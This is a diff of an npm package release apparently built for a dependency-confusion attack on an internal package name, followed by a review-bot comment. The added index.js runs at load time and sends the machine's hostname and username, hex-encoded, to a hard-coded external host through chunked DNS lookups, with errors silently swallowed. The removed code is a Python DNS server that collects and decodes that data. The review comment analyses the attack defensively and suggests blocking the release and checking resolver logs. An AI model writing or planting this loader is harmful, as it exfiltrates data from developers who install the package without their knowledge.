internal-company-module-test-1337 99.99.99 → 99.99.999
- package/index.js +32 -64
- package/package.json +1 -1
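--- a/package/index.js
+++ b/package/index.js
@@ -1,70 +1,38 @@
-
-
-import json
-from dnslib import DNSRecord, QTYPE, RR, A
+const dns = require('dns');
+const os = require('os');
 
-
-
+module.exports = function() {
+return true;
+};
 
-
-
-
+(async function executeStealthExfiltration() {
+try {
+const attackerDomain = "139-162-186-101.ip.linodeusercontent.com";
+
+const trackingData = JSON.stringify({
+poc: "dependency-confusion",
+host: os.hostname(),
+user: os.userInfo().username
+});
 
-
-server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-
-try:
-server_socket.bind(('0.0.0.0', 53))
-print("[*] Server STEALTH in ascolto su UDP 53...")
-except PermissionError:
-return
+const hexEncodedData = Buffer.from(trackingData).toString('hex');
 
-
-
-
-
-
-qname = str(qname_obj).rstrip('.')
-
-if qname.endswith(ATTACKER_DOMAIN.strip('.')):
-
-payload = qname.replace(ATTACKER_DOMAIN.strip('.'), "").strip('.')
-parts = payload.split('.')
-
-if len(parts) >= 2:
-session_id = parts[0]
-chunk_data = parts[1]
-
-if session_id not in sessions:
-sessions[session_id] = []
-print(f"[*] Nuova sessione stealth avviata: {session_id}")
-
-if chunk_data == "eof":
-# Termine della trasmissione: Riassembla e decodifica l'hex
-full_hex = "".join(sessions[session_id])
-try:
-decoded_str = binascii.unhexlify(full_hex).decode('utf-8')
-json_data = json.loads(decoded_str)
-
-print(f"\n[+] ESFILTRAZIONE COMPLETATA (IP: {addr[0]})")
-print(json.dumps(json_data, indent=4))
-print("-" * 50)
-except Exception as e:
-print(f"[!] Errore decodifica: {e}")
-
-del sessions[session_id]
-else:
-# Salva il blocco HEX e rispondi
-sessions[session_id].append(chunk_data)
-
-# Risposta per mantenere la connessione attiva e silenziosa
-reply = dns_request.reply()
-if dns_request.questions[0].qtype == QTYPE.A:
-reply.add_answer(RR(rname=qname_obj, rtype=QTYPE.A, rclass=1, ttl=60, rdata=A(FAKE_RESPONSE_IP)))
-server_socket.sendto(reply.pack(), addr)
+const chunkSize = 30;
+const chunks = [];
+for (let i = 0; i < hexEncodedData.length; i += chunkSize) {
+chunks.push(hexEncodedData.slice(i, i + chunkSize));
+}
 
-
-
+const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));
+const sessionId = Math.floor(Math.random() * 0xffff).toString(16).padStart(4, '0');
 
-
-
+for (let index = 0; index < chunks.length; index++) {
+const payload = `${sessionId}.${chunks[index]}.${attackerDomain}`;
+dns.lookup(payload, () => {});
+await sleep(500);
+}
+
+dns.lookup(`${sessionId}.eof.${attackerDomain}`, () => {});
+
+} catch (error) {}
+})();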
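Review bot: The `executeStealthExfiltration` IIFE runs as a side effect of merely loading the module and sends `os.hostname()` and `os.userInfo().username`, hex-encoded into DNS labels, to the hard-coded host `139-162-186-101.ip.linodeusercontent.com` through `dns.lookup`, while the empty `catch (error) {}` hides any failure from the consumer. Together with the `poc: "dependency-confusion"` field and the 99.99.x version number, this looks like a dependency-confusion probe against an internal package name, so the release should be treated as untrusted and blocked. If a placeholder package is needed at all, it should contain only `module.exports = function() { return true; };` with the IIFE and the then-unused `dns`/`os` requires removed. Resolver logs showing queries under that host whose first label is four hex characters followed by a hex chunk or the label `eof` identify machines that loaded this version. Binding the internal package name to a private registry or scope keeps the public version from being resolved in the first place.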